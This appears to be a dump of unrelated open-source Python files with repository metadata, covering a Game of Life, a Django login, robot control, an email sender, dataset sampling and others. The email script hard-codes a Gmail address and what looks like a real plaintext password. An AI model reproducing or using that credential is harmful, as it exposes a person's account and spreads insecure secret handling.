u,b,i,v,s='[{<(',dict,0,0,e.s
z=b(zip(u,']}>)'))
while i<len(c):
k=c[i];h=k in z
if h and c[i+1]==z[k]:exec b(zip(u,['v+=x','v+=s[e.a].pop()if s[e.a]else 0','e.a=1-e.a','v+=1']))[k]
elif h:
n,y=0,i
while c[:i+1].count(k)>c[:i+1].count(z[k]):i+=1
r=c[y+1:i]
if k!='{':n=e(r)
exec b(zip(u,['n=-n','while s[e.a]and s[e.a][-1]:v+=e(r)','n','s[e.a]+=[n]']))[k]
v+=n
i+=1
return v
e.s,e.a=[map(int,sys.argv[2:]),[]],0
e(sys.argv[1])
for s in e.s[e.a]:print s
|
[
"alexhuleatt@Alexanders-MacBook-Pro.local"
] |
alexhuleatt@Alexanders-MacBook-Pro.local
|
0f6345d0f5daccc153be1ada859f3ad57db4dc02
|
3015b07ab56da859507abc3881385f4995980600
|
/fisher/view_models/gift.py
|
34dcb36fd285f7c38d45f5b1ee0e45cbc0245c56
|
[] |
no_license
|
xuewen1696/fisher-book-practice
|
f65c559651f5a51d08cfdcb96a4fc8f96f481238
|
93ce16de333381196aaa2de4811559d5c27d7e0c
|
refs/heads/master
| 2022-12-10T06:31:25.912229
| 2018-07-28T07:26:32
| 2018-07-28T07:26:32
| 142,654,555
| 0
| 1
| null | 2022-12-08T02:22:41
| 2018-07-28T06:53:34
|
CSS
|
UTF-8
|
Python
| false
| false
| 929
|
py
|
from collections import namedtuple
from fisher.view_models.book import BookViewModel
# MyGift = namedtuple('MyGift', ['id', 'book', 'count'])
class MyGifts:
def __init__(self, wish_count_list, gifts_of_mine):
self.gifts = []
self.__wish_count_list = wish_count_list
self.__gifts_of_mine = gifts_of_mine
self.gifts = self.__parse()
def __parse(self):
temp_gifts = []
for gift in self.__gifts_of_mine:
my_gift = self.__matching(gift)
temp_gifts.append(my_gift)
return temp_gifts
def __matching(self, gift):
count = 0
for wish_count in self.__wish_count_list:
if gift.isbn == wish_count.isbn:
count = wish_count['count']
r = {
'id': gift.id,
'book': BookViewModel(gift.book),
'count': count
}
my_gift = r
return my_gift
|
[
"xuewen1696@163.com"
] |
xuewen1696@163.com
|
867a075faec0fc3a81c60d0365a6e18d2b25319b
|
233a63dfe44263826770b5969c7fc228bc5bb0c2
|
/GUI_version/evolve_func.py
|
8730257849b727effaa823f95181e49c1b8de17b
|
[] |
no_license
|
kawin7538/GameOfLife
|
4c65c1af138d653276493c8f00c3cb3ab2be70ca
|
96b6227f7e08d4460041281694c735666d6c12ad
|
refs/heads/master
| 2020-05-19T11:09:17.739863
| 2019-05-12T11:18:56
| 2019-05-12T11:18:56
| 184,984,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,927
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat May 4 15:57:55 2019
@author: Kawin-PC
"""
def evolve(grid):
#initialize liveCells as empty list
liveCells=list()
#access every cells in grid
for i in range(grid.numRows()):
for j in range(grid.numCols()):
#count neighbors that is LIVE CELL around (i,j)
neighbors=grid.numLiveNeighbors(i,j)
#if neighbors is 2 and (i,j) has live or neighbors is 3
if (neighbors==2 and grid.isLiveCell(i,j)) or neighbors==3:
#this cell will live in next turn
liveCells.append((i,j))
#configure grid with new live Cell
grid.configure(liveCells)
def evolve_v2(grid):
#initialize liveCells as empty set
liveCells=set()
#initial unknown cell as empty set
unknownCells=set()
#iteration in every item in liveDict
for key,_ in grid._liveDict.items():
#add all dead cell around this live cell to unknownCells
unknownCells.update([(i,j) for j in range(max(0,key[1]-1),min(key[1]+1\
,grid.numCols()-1)+1) for i in range(max(0,key[0]\
-1),min(key[0]+1,grid.numRows()-1)+1) if not grid.isLiveCell(i,j)])
#find number of neighbors around this cell
neighbors=grid.numLiveNeighbors(key[0],key[1])
#check neighbors from condition , if true then add to liveCells
if (neighbors==2 and grid.isLiveCell(key[0],key[1])) or neighbors==3:
liveCells.add(key)
#iteration in every unknownCells
for i,j in unknownCells:
#find neighbors of this cell
neighbors=grid.numLiveNeighbors(i,j)
#check condition with neighbors , if true then add to liveCells
if (neighbors==2 and grid.isLiveCell(i,j)) or neighbors==3:
liveCells.add((i,j))
#configure grid with liveCells
grid.configure(list(liveCells))
|
[
"kawin7538@gmail.com"
] |
kawin7538@gmail.com
|
1ca07427f06ff0b0545654fdeef1e43c4a964979
|
48e32d67b984fc7505a9b1556b0273cede2848e4
|
/ske_customization/customizations_for_ske/doctype/hypothecation_company/test_hypothecation_company.py
|
113f06e4d851848165fc922c74859c9a40d5562b
|
[
"MIT"
] |
permissive
|
akshay83/ske_customization
|
86c776d37000ed97ddee63bb5ee84901d610414a
|
910e8ca88ffc83554ebb23f7480901dba9f08221
|
refs/heads/master
| 2021-01-02T23:09:00.888981
| 2020-05-08T07:41:52
| 2020-05-08T07:41:52
| 98,892,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 290
|
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015, Akshay Mehta and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
# test_records = frappe.get_test_records('Hypothecation Company')
class TestHypothecationCompany(unittest.TestCase):
pass
|
[
"mehta.akshay@gmail.com"
] |
mehta.akshay@gmail.com
|
5d5f9c33e96e4005998e5b45f372eab18a6bca4d
|
711756b796d68035dc6a39060515200d1d37a274
|
/output_cog/optimized_27953.py
|
09f31b1b8ab72abff172933a01275553c5eb9d7b
|
[] |
no_license
|
batxes/exocyst_scripts
|
8b109c279c93dd68c1d55ed64ad3cca93e3c95ca
|
a6c487d5053b9b67db22c59865e4ef2417e53030
|
refs/heads/master
| 2020-06-16T20:16:24.840725
| 2016-11-30T16:23:16
| 2016-11-30T16:23:16
| 75,075,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,843
|
py
|
import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((613.939, 549.207, 490.2), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((562.859, 537.597, 531.075), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((489.323, 530.601, 570.859), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((488.926, 561.447, 434.039), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((347.183, 509.951, 702.034), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((577.763, 552.573, 519.036), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((579.072, 553.888, 518.272), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((598.179, 570.237, 506.068), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((608.98, 595.484, 500.552), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((593.787, 609.001, 481.138), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((591.105, 630.195, 499.355), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((587.507, 644.998, 523.082), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((602.233, 539.559, 512.34), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((576.902, 749.27, 541.163), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((447.415, 662.788, 670.034), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((447.415, 662.788, 670.034), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((454.94, 640.651, 653.058), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((462.598, 619.14, 635.443), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((474.235, 600.677, 616.645), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((493.111, 586.147, 600.202), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((516.336, 574.803, 586.89), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((541.321, 567.948, 573.621), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((440.647, 803.794, 602.929), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((655.636, 337.061, 539.021), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((526.957, 540.456, 597.521), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((526.957, 540.456, 597.521), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((521.199, 540.616, 569.615), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((503.194, 549.561, 547.989), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((481.745, 532.73, 537.655), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((572.279, 533.153, 452.556), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((386.301, 528.781, 619.136), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((554.534, 537.457, 502.882), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((554.535, 537.452, 502.757), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((538.268, 519.685, 514.754), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((532, 546.991, 524.566), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((548.202, 567.968, 536.238), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((568.133, 588.079, 541.251), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((586.208, 609.874, 544.558), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((604.026, 631.697, 548.543), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((604.448, 556.335, 588.454), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((602.71, 708.462, 505.837), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((583.959, 515.305, 583.074), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((561.891, 516.483, 568.028), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((514.205, 521.231, 534.961), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((472.803, 529.621, 496.804), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((522.749, 493.257, 443.031), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((377.174, 569.157, 486.864), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((591.503, 484.834, 468.883), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((571.077, 484.569, 488.528), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((550.141, 484.683, 508.388), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((528.144, 487.307, 527.227), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((508.706, 482.584, 549.07), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((487.983, 481.048, 570.41), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((553.92, 514.152, 542.599), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((418.189, 449.589, 604.796), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
|
[
"batxes@gmail.com"
] |
batxes@gmail.com
|
cf7ef5b0adbbc5686cba414b5d88f338966602b7
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_200/3074.py
|
c8f838154185a6edab1140e278a15ba6ec737807
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 457
|
py
|
def main():
T = int(input().strip())
for t in range(T):
N = list(input().strip())
for i in range(len(N)-1, 0, -1):
if int(N[i]) < int(N[i-1]):
N[i-1] = str(int(N[i-1])-1)
j = i
                while j < len(N) and N[j] != '9':
N[j] = '9'
j += 1
print('Case #{}: {}'.format(t+1, int(''.join(N))))
if __name__ == '__main__':
main()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
895c17f67d35ca30f9d2b319b3786a86e053582d
|
8e853ea941169955c6a0c5fd19f18445cef30649
|
/setup.py
|
aa065ad0a8c2746dff4db92241fb3db7fb46f7ac
|
[
"BSD-3-Clause"
] |
permissive
|
djangosporti/shellpy
|
73b7d9d85800f6090a37a1afab048538c93b5de6
|
3d6c1fb7f6fb9820470f7871c08fd1a9ca78f552
|
refs/heads/master
| 2021-01-15T21:08:25.652465
| 2016-02-28T09:48:25
| 2016-02-28T09:48:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 808
|
py
|
#!/usr/bin/env python
try:
from setuptools import setup
args_for_setup = {'entry_points': {
'console_scripts': {
'shellpy = shellpython.shellpy:main'
}
}}
except ImportError:
from distutils.core import setup
args_for_setup = {'scripts': ['shellpy']}
setup(name='shellpy',
version='0.4.0',
description='A convenient tool for shell scripting in python',
author='Alexander Ponomarev',
author_email='alexander996@yandex.ru',
url='https://github.com/lamerman/shellpy/',
download_url='https://github.com/lamerman/shellpy/tarball/0.4.0',
keywords=['shell', 'bash', 'sh'],
packages=['shellpython'],
package_data={'shellpython': ['*.tpl']},
install_requires=['colorama'],
**args_for_setup
)
|
[
"alexander996@yandex.ru"
] |
alexander996@yandex.ru
|
ca9231cd7675480ce6536c5e7e8fd385d2d6151e
|
4bb21e84e1de39a7b15ad000f47f10bd34a7f165
|
/Scripting_With_Python/email_Playground/Sending_emails_with_python.py
|
cb364bd120bfe7c997a8ffc76da9a2a7fe68197c
|
[] |
no_license
|
manishawsdevops/pythonmaster
|
a32d91e24b04250cd102b9acada367c385d12976
|
e2459536f2ea091be8aba7c9307373802a04a332
|
refs/heads/main
| 2023-06-12T23:59:26.991154
| 2021-07-09T11:19:11
| 2021-07-09T11:19:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 769
|
py
|
# Sending emails with Python.
# Python has the inbuilt email modules.
import smtplib
from email.message import EmailMessage
# For an email we need the from address, the to address, the subject and the content
# First we need to create email object
email = EmailMessage()
email['from'] = 'Manish AWS Freelancer'
email['to'] = 'manishawsfreelancer@gmail.com'
email['subject'] = 'This email is testing as a python learning course'
# In the content we are going to write the actual message.
email.set_content(
'Heyyyyy You have received this as a part of python learning')
with smtplib.SMTP(host='smtp.gmail.com', port=587) as smtp:
smtp.ehlo()
smtp.starttls()
smtp.login('manishawsdevops@gmail.com', 'Mummydaddy@1994')
smtp.send_message(email)
print('All Good')
|
[
"manishawsfreelancer@gmail.com"
] |
manishawsfreelancer@gmail.com
|
2eba1be43550d89d779b8adfdf934bc8cc96883f
|
3a4278ddfabbcf42811363c0db3def18e406cd94
|
/Main.py
|
4ee34ce95f42e1f2f0f088ea6bd692c06ef23a36
|
[
"MIT"
] |
permissive
|
rodgersa1/HelloRobot1
|
0757f08e4622c7de592aea775553df3ee6b01ff1
|
b67833688cdb2f46c75da790d6087c34b8638139
|
refs/heads/master
| 2021-06-30T02:06:21.474854
| 2017-09-20T18:23:38
| 2017-09-20T18:23:38
| 103,976,284
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 910
|
py
|
from gopigo import *
import time
class Piggy(object):
    def __init__(self):
        print("I AM ALIVE")
    def pulse(self):
        """check for obstacles, drive a fixed amount forward"""
        look = us_dist(15)  # store the distance reading
        if look > 80:
            fwd()
            time.sleep(1)
            stop()
    def cruise(self):
        """drive fwd, stop if the sensor detects an obstacle"""
        fwd()
        while True:
            if us_dist(15) < 30:
                stop()
                time.sleep(.2)
    def servo_sweep(self):
        """loops through a 120 degree arc and moves the servo"""
        for ang in range(20, 160, 2):
            servo(ang)
            time.sleep(.2)
    def cha_cha(self):
        for x in range(5):
            right_rot()
            time.sleep(.5)
            left_rot()
            time.sleep(.5)
            stop()
p = Piggy()
|
[
"ivorycoastdre42@gmail.com"
] |
ivorycoastdre42@gmail.com
|
92d8c787ecda8f9124cfff1d9ef89b1c60b01c95
|
6bcd69393c57dd16e0cea56dd554ccd464aa42d5
|
/venv/bin/weasyprint
|
e2fb502abea3bb9745dfd00576d2d8044dec8b70
|
[] |
no_license
|
ecustovic/PdfReports
|
6f4f48839bddd03fa79565cf7b65c0207eea9d48
|
7db82351ddc280878082142fab50a6157f97729f
|
refs/heads/master
| 2023-02-03T09:12:23.059140
| 2020-03-06T13:29:08
| 2020-03-06T13:29:08
| 244,865,428
| 0
| 0
| null | 2023-01-19T17:44:26
| 2020-03-04T09:59:03
|
Python
|
UTF-8
|
Python
| false
| false
| 264
|
#!/home/emina/rails-studio/test_pdf_reports/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from weasyprint.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"emina.custovic@edu.fit.ba"
] |
emina.custovic@edu.fit.ba
|
|
c8b22cb55233ad80405b9391f90d05955a09335b
|
7be1e309cd001421b334b027443dec3b4dda9430
|
/14.py
|
d1aa9fc1c213d3627a8c84816a1002fb63a8e578
|
[] |
no_license
|
Eomund/AdventOfCode
|
e144e23a1e9d0e53dd5a58dd768291a5df72a391
|
d6a133584b98a00d0eb95c98a0c0d681bc1a5f87
|
refs/heads/master
| 2020-04-15T23:57:51.751216
| 2019-01-10T19:33:32
| 2019-01-10T19:33:32
| 165,118,946
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 390
|
py
|
rec = [3, 7]
elf1 = 0
elf2 = 1
end = int(input())
while len(rec) < end + 10:
new = str(rec[elf1] + rec[elf2])
for char in new:
rec.append(int(char))
elf1 = (elf1 + 1 + rec[elf1]) % len(rec)
elf2 = (elf2 + 1 + rec[elf2]) % len(rec)
ans = rec[end:end + 10]
s = ""
for a in ans:
s += str(a)
print(s)
|
[
"noreply@github.com"
] |
Eomund.noreply@github.com
|
538d6fa336411b2d3d8a4343aede902e6aaec94f
|
9db62c85450eb6517c904e5cf6ad4de5158c2af4
|
/src/account/views.py
|
e950f49d2cc6ef3f6d20b248174b1beebf20a470
|
[] |
no_license
|
bhubs-python/djpos
|
c50d5e3b397fb549d6fbb2a4b908bd5c7ccb485f
|
70d3d43e50490e90521efff71e818c40366c415a
|
refs/heads/master
| 2021-04-27T04:18:05.513056
| 2018-02-26T12:22:15
| 2018-02-26T12:22:15
| 122,729,668
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 973
|
py
|
from django.shortcuts import render, redirect, get_object_or_404
from django.views import View
from django.contrib.auth import login, logout
from django.db.models import Q
from . import forms
from . import models
# logout
def logout_request(request):
logout(request)
return redirect('account:login')
class Login(View):
template_name = 'account/login.html'
def get(self, request):
loginForm = forms.LoginForm()
variables = {
'loginForm': loginForm,
}
return render(request, self.template_name, variables)
def post(self, request):
loginForm = forms.LoginForm(request.POST or None)
if loginForm.is_valid():
user = loginForm.login()
if user:
login(request, user)
return redirect('home:index')
variables = {
'loginForm': loginForm,
}
return render(request, self.template_name, variables)
|
[
"mubarak117136@gmail.com"
] |
mubarak117136@gmail.com
|
b8058a5bc2e12b2774f9b9e16dcb6947a3041297
|
4f51c13ab4a824b98aef42e65c9e0eb0e0c907e6
|
/batch_sampler.py
|
bc3cc03d9d0550c3fe0d78cabfe60629aa030dc6
|
[
"Apache-2.0"
] |
permissive
|
804463592/triplet-reid-pytorch
|
f71175a1eb94e8d2e6f854fe64b34d36bff34302
|
96ee13ebe1c7cb094d8bcf9f3ddf5e5f85d98f35
|
refs/heads/master
| 2020-04-03T11:14:24.951186
| 2018-09-29T06:09:48
| 2018-09-29T06:09:48
| 155,215,577
| 2
| 0
|
Apache-2.0
| 2018-10-29T13:21:36
| 2018-10-29T13:21:35
| null |
UTF-8
|
Python
| false
| false
| 2,220
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import torch
from torch.utils.data import Dataset, DataLoader
from torch.utils.data.sampler import Sampler
import cv2
import numpy as np
import random
class RegularBatchSampler(Sampler):
'''
sampler used in dataloader. method __iter__ should output the indices each time it is called
'''
def __init__(self, dataset, n_class, n_num, *args, **kwargs):
super(RegularBatchSampler, self).__init__(dataset, *args, **kwargs)
self.n_class = n_class
self.n_num = n_num
self.batch_size = n_class * n_num
self.dataset = dataset
self.labels = np.array(dataset.labels)
self.len = len(dataset) // self.batch_size
self.lb_img_dict = dataset.lb_img_dict
for k, v in self.lb_img_dict.items():
random.shuffle(self.lb_img_dict[k])
def __iter__(self):
count = 0
while count <= self.len:
label_batch = np.random.choice(self.labels, self.n_class, replace = False)
idx = []
for lb in label_batch:
if len(self.lb_img_dict[lb]) > self.n_num:
idx_smp = np.random.choice(self.lb_img_dict[lb],
self.n_num, replace = False)
else:
idx_smp = np.random.choice(self.lb_img_dict[lb],
self.n_num, replace = True)
# for i, im_idx in enumerate(idx_smp):
# im_name = self.dataset.imgs[im_idx]
# im = cv2.imread(im_name)
# cv2.imshow('img_{}'.format(i), im)
# cv2.waitKey(0)
idx.extend(list(idx_smp))
yield idx
count += 1
def __len__(self):
        return len(self.dataset) // self.batch_size
if __name__ == "__main__":
from datasets.Market1501 import Market1501
ds = Market1501('datasets/Market-1501-v15.09.15/bounding_box_train', mode = 'train')
sampler = RegularBatchSampler(ds, 5, 4)
dl = DataLoader(ds, batch_sampler = sampler, num_workers = 4)
for i, (ims, lbs) in enumerate(dl):
print(ims.shape)
print(lbs.shape)
# if i == 4: break
|
[
"867153576@qq.com"
] |
867153576@qq.com
|
a999a910907ed10fc21700f83ad2a7277ed87aeb
|
1b26a8948d65b6fa5f4b08cea2bf5ea48e43e977
|
/day1_candyBucket.py
|
bd476569f33261a6d7cc2e4f40903baf52825d16
|
[] |
no_license
|
DeveloperChoi90/programmers_kdigital
|
